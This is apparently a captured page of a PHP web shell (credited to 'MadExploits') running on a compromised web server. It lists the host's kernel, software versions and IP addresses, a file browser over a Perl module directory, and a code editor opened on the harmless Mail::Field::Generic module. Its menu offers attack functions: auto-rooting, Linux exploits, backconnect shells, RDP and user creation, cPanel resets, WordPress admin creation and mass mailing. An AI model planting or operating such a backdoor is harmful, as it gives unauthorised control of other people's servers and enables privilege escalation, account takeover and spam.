Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Mail /
Field /
[ HOME SHELL ]
Name
Size
Permission
Action
AddrList.pm
1.4
KB
-rw-r--r--
AddrList.pod
3.43
KB
-rw-r--r--
Date.pm
1.1
KB
-rw-r--r--
Date.pod
2.36
KB
-rw-r--r--
Generic.pm
591
B
-rw-r--r--
Generic.pod
2.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Generic.pm
# Copyrights 1995-2012 by [Mark Overmeer <perl@overmeer.net>]. # For other contributors see ChangeLog. # See the manual pages for details on the licensing terms. # Pod stripped from pm file by OODoc 2.00. package Mail::Field::Generic; use vars '$VERSION'; $VERSION = '2.12'; use Carp; use base 'Mail::Field'; sub create { my ($self, %arg) = @_; $self->{Text} = delete $arg{Text}; croak "Unknown options " . join(",", keys %arg) if %arg; $self; } sub parse { my $self = shift; $self->{Text} = shift || ""; $self; } sub stringify { shift->{Text} } 1;
Close